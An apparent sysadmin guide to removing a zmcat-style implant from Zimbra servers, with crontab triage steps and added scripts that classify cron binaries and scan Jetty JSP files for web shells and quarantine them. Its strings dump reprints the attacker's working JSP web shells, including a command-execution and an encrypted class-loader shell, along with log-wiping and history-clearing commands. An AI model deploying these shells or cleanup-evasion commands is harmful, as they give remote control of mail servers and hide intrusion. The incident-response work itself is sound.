Yet another zmcat or counterpart cleaning guide for Zimbra
This zmcat derivative, and the attacker behind it, is tailored to Zimbra. Many of the dropped files look like parts of Zimbra but live in unexpected paths; interestingly, there were no unexpected files in /tmp. Something running in the background also trims or edits most of the log files. Start by making the zimbra user's crontab immutable, so nothing can rewrite it while you work:
chattr +i /var/spool/cron/crontabs/zimbra
Then inspect every record in the crontab, reading each line to its end. Some entries look like Zimbra's own services, but they are NOT!
For example, 'zmmysqlstatus' is a real Zimbra tool, but the real zmmysqlstatus is a Perl script in /opt/zimbra/bin, while the fake zmmysqlstatus is an executable binary in /opt/zimbra/libexec. The same goes for names like zmtrainsa, zmstat and so on. They can be anywhere!!
Next, inspect the suspected binaries with a hex editor such as Bless. We found strings like the ones below, which include the attacker's life's work:
rb wb+ wb /proc/self/exe ' | awk '{print $2}' | xargs kill -9 > /dev/null 2>&1; ps aux | grep -v grep | grep ' touch -r > /dev/null 2>&1 nohup > /dev/null 2>&1 & ' / r /proc/%s %d (crontab -l |grep -v ' )|crontab - crontab -l | grep -v grep | grep ' sed -i -E '/ ( )| /d' /opt/zimbra/log/ .pid %Y/%m/%d f****************h - - chmod -R 455 /opt/zimbra/jetty/webapps/zimbra/downloads delete: %s failed! delete: %s successfully. /opt/zimbra/jetty/webapps/zimbraAdmin/public/jsp /Alert.jsp /Zimbra.jsp ")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%> <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request .getParameter(" /opt/zimbra/jetty/webapps/zimbra/public/jsp /CryptCore.jsp /Crypt.jsp " .equals( request .getParameter("ppwd"))){java.io.InputStream in = Runtime.getRuntime() .exec(new String[]{"/bin/sh","-c", request .getParameter("pcom")}).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.print(new String(b,0,a));}out.print("</pre>");}else{out.print("</pre>");}%> <%if (" write %s: successfully. write %s: failed! %s: exist. zmstorewatch /tmp/ tor2web. 
wget curl /opt/zimbra/lib/libsetuid.so XZimbra\.jsp Ajax\.jsp attachment_blocked\.jsp Core Debug\.jsp static\.jsp ppwd= 66\.04 /opt/zimbra/log/*_log.20 /opt/zimbra/log/nginx.access.log history -c > /dev/null 2>&1 zmqueuelog /opt/zimbra/bin/ zmmysqlstatus /opt/zimbra/libexec/ /opt/zimbra/lib/ swatchdog zmclientcertmgr /opt/zimbra/bin zmtrainsa watchdog /opt/zimbra/common/bin/ zmstat /opt/zimbra/zmstat/ lwatchdog Hok8gxZFafGORRLCiowY_vpqNappusQV8agmQkI7wKk /tmp/.cache zmmailboxdwatch /opt/zimbra/jetty/webapps/zimbra/public/jsp/infoc.jsp /opt/zimbra/jetty/webapps/zimbra/public/jsp/BootCore.jsp /opt/zimbra/jetty/webapps/zimbra/public/jsp/ShareCore.jsp /opt/zimbra/jetty/webapps/zimbra/public/jsp/ZimbraCore.jsp /opt/zimbra/jetty/webapps/zimbra/public/jsp/Online.jsp /opt/zimbra/jetty/webapps/zimbra/public/404.jsp /opt/zimbra/conf/zmsstorewatch.cnf /opt/zimbra/conf/zmsstore.cnf /opt/zimbra/lib/zmmailboxdwatch /opt/zimbra/lib/zmstorewatch /tmp/.cache/.ntp /tmp/.cache/.kthrotlds ÿÿÿ
There are many payloads: shared object files, binary executables and scripts, mostly appended to the end of your real files, plus completely fake .jsp files. In particular, if you find binaries carrying a UPX! marker near the start in the hex editor (UPX-packed executables), you are on the right track.
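The crontab triage described above can be scripted. The following is an added example, not a script from the original post: it walks the zimbra crontab, classifies each launched file by its magic bytes (shebang script, ELF, UPX-packed ELF) and flags entries that reuse the name of a genuine /opt/zimbra/bin helper from another directory, run from outside the Zimbra root, or use hidden file names. The directory layout and crontab that setup_demo builds are constructed for the demo; on a real host you would point triage_crontab at /var/spool/cron/crontabs/zimbra and /opt/zimbra.

```shell
#!/bin/sh
# Added example, not code from the original post. Triage the zimbra crontab the
# way the text describes by hand: for each command it launches, decide whether
# the file is a script, a plain ELF binary or a UPX-packed ELF, and whether it
# impersonates a genuine helper from $ROOT/bin (the real zmmysqlstatus is a
# Perl script in /opt/zimbra/bin; the implant's copy is a binary elsewhere).
# On a real host: triage_crontab /var/spool/cron/crontabs/zimbra /opt/zimbra
# The directory built by setup_demo below is constructed for the demo.

# classify_file FILE -> missing | script | elf | elf-upx | other
classify_file() {
    f=$1
    [ -f "$f" ] || { echo missing; return 0; }
    magic=$(head -c 4 "$f" | od -An -tx1 | tr -d ' \n')
    case "$magic" in
        7f454c46)
            # UPX keeps its marker string inside the packed image
            if grep -qa 'UPX!' "$f"; then echo elf-upx; else echo elf; fi ;;
        2321*) echo script ;;      # "#!" shebang
        *)     echo other ;;
    esac
}

# triage_crontab CRONTAB ROOT -> one line per entry:
#   "OK <cmd> (<kind>)" or "SUSPECT <cmd> (<kind>): <reasons>"
triage_crontab() {
    crontab=$1; root=$2
    while IFS= read -r line || [ -n "$line" ]; do
        case "$line" in ''|'#'*|[A-Za-z_]*=*) continue ;; esac  # blank, comment, VAR=value
        set -f; set -- $line; set +f       # split fields without globbing the '*'s
        case "$1" in
            @*) [ $# -ge 2 ] || continue; shift 1 ;;   # @reboot and friends
            *)  [ $# -ge 6 ] || continue; shift 5 ;;   # five time fields, then the command
        esac
        cmd=$1; name=${cmd##*/}
        kind=$(classify_file "$cmd")
        reason=
        if [ -f "$root/bin/$name" ] && [ "$cmd" != "$root/bin/$name" ]; then
            reason="same name as $root/bin/$name"
        fi
        case "$kind" in elf-upx) reason="${reason:+$reason, }UPX-packed ELF" ;; esac
        case "$cmd" in "$root"/*) ;; *) reason="${reason:+$reason, }outside $root" ;; esac
        case "$name" in .*) reason="${reason:+$reason, }hidden file name" ;; esac
        if [ -n "$reason" ]; then echo "SUSPECT $cmd ($kind): $reason"
        else echo "OK $cmd ($kind)"; fi
    done < "$crontab"
}

# setup_demo -> prints a constructed directory: $DIR/root mimics /opt/zimbra,
# $DIR/tmp mimics /tmp, $DIR/crontab mimics the zimbra user's crontab.
setup_demo() {
    d=$(mktemp -d)
    mkdir -p "$d/root/bin" "$d/root/libexec" "$d/tmp/.cache"
    printf '#!/usr/bin/perl\n# genuine helper\n' > "$d/root/bin/zmmysqlstatus"
    # fake helper: ELF magic plus the UPX marker, enough for the classifier
    printf '\177ELF\002\001\001UPX!' > "$d/root/libexec/zmmysqlstatus"
    printf '\177ELF\002\001\001' > "$d/tmp/.cache/.ntp"
    cat > "$d/crontab" <<EOF
MAILTO=""
# genuine entry
10 * * * * $d/root/bin/zmmysqlstatus > /dev/null 2>&1
# entries planted by the implant
*/5 * * * * $d/root/libexec/zmmysqlstatus > /dev/null 2>&1
@reboot $d/tmp/.cache/.ntp > /dev/null 2>&1
EOF
    echo "$d"
}

demo=$(setup_demo)
triage_crontab "$demo/crontab" "$demo/root"
rm -rf "$demo"
```

The classifier only looks at the first four bytes and the UPX marker, so treat its verdicts as a starting point: a script entry can still be malicious, and a binary that is neither packed nor impersonating anything still deserves a look if the name is not one you installed.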
Now use the 'top' command to look for anything running in the background. Check each process's working directory and executable path (pwdx, and the /proc/<PID>/exe link) to tell real from fake, and if it is fake, kill it:
pwdx <PID>
kill <PID>
Repeat this for every suspected cron entry. Note down all of those file names and scripts.
All of these processes run under the zimbra user. You can use pkill to stop every zimbra process, which shuts down your mail service but leaves you certain that nothing infected is still running; otherwise kill them one by one.
pkill -u zimbra
Now unlock the cron file, back it up, and delete the unwanted lines with a text editor such as nano:
chattr -i /var/spool/cron/crontabs/zimbra
cp /var/spool/cron/crontabs/zimbra /var/spool/cron/crontabs/zimbra_copy
nano /var/spool/cron/crontabs/zimbra
Save your changes and review the cron file again. If something is still running in the background, it will overwrite the file.
Assuming everything is okay, lock the cron file again:
chattr +i /var/spool/cron/crontabs/zimbra
If you used pkill -u zimbra, you need to restart your mail server.
su - zimbra
zmcontrol restart
Check your services, they should work well.
zmcontrol status
Then remove all the files you noted, but not by deleting them directly: move them to a temporary directory outside the web root first, so they can still be examined. Check the end of the .jsp files and delete the appended lines. Restart your mail server, wait two minutes and check the status. If everything is okay, your server is clean. Then download and install the Zimbra patch for your release.
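Scanning the Jetty webapps tree for the web shell indicators seen in the strings dump above (the ppwd/pcom parameters, Runtime.getRuntime().exec, defineClass, the BASE64Decoder/Cipher pair, and the dropped file names) and quarantining hits instead of deleting them, as an added example that is not part of the original post. The webapps tree, the quarantine directory and the JSP contents it creates are constructed for the demo; on a real host you would scan /opt/zimbra/jetty/webapps and quarantine to a directory outside the web root.

```shell
#!/bin/sh
# Added example, not from the original post: locate web shells in the Jetty
# webapps tree using indicators visible in the strings dump, report the line
# number of each hit (an appended shell sits on the last line of a real page),
# and move hits into a quarantine directory that keeps the original path.
# On a real host: scan_webapps /opt/zimbra/jetty/webapps
# Everything setup_demo creates is constructed for the demo.

# Content indicators from the dump (extended regex).
SHELL_RE='getParameter\("(ppwd|pcom)"\)|Runtime\.getRuntime\(\)\.exec\(|defineClass\(|BASE64Decoder|Cipher\.getInstance\('
# File names the implant drops under public/jsp, also from the dump.
DROPPED_NAMES='infoc.jsp BootCore.jsp ShareCore.jsp ZimbraCore.jsp Online.jsp CryptCore.jsp Crypt.jsp Alert.jsp Zimbra.jsp'

# scan_webapps DIR -> one line per finding:
#   "CONTENT <file> <line>"  an indicator matched on that line of a .jsp
#   "NAME <file>"            the file uses one of the dropped names
scan_webapps() {
    dir=$1
    find "$dir" -type f -name '*.jsp' | sort | while IFS= read -r f; do
        name=${f##*/}
        for bad in $DROPPED_NAMES; do
            if [ "$name" = "$bad" ]; then echo "NAME $f"; fi
        done
        grep -nE "$SHELL_RE" "$f" 2>/dev/null | cut -d: -f1 | while read -r n; do
            echo "CONTENT $f $n"
        done
    done
}

# quarantine_file FILE QDIR -> moves FILE to QDIR/<original absolute path>,
# keeping mode and timestamps (cp -p) for later analysis or restore; prints
# the new path.
quarantine_file() {
    f=$1; q=$2
    mkdir -p "$q$(dirname "$f")"
    cp -p "$f" "$q$f" && rm -f "$f"
    echo "$q$f"
}

# setup_demo -> prints a constructed directory holding a small webapps tree
# and an empty quarantine directory.
setup_demo() {
    d=$(mktemp -d)
    w=$d/webapps/zimbra/public/jsp
    mkdir -p "$w" "$d/quarantine"
    # clean page
    printf '<%%@ page contentType="text/html" %%>\n<html><body>hello</body></html>\n' > "$w/clean.jsp"
    # real-looking page with a shell appended after the genuine content,
    # modelled on the ppwd/pcom one-liner in the dump
    cp "$w/clean.jsp" "$w/infected.jsp"
    printf '<%%if("x".equals(request.getParameter("ppwd"))){Runtime.getRuntime().exec(request.getParameter("pcom"));}%%>\n' >> "$w/infected.jsp"
    # dropped file using one of the names from the dump
    printf '<%%out.print(1);%%>\n' > "$w/BootCore.jsp"
    echo "$d"
}

demo=$(setup_demo)
scan_webapps "$demo/webapps"
rm -rf "$demo"
```

The indicator list is only what this particular implant left behind; a different build will use other parameter names, so the reliable check is still a diff of the webapps tree against a pristine install of the same Zimbra release. Quarantining rather than deleting keeps the evidence and lets you restore a page you flagged by mistake.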
Lastly, don't forget to change your passwords, including the admin accounts.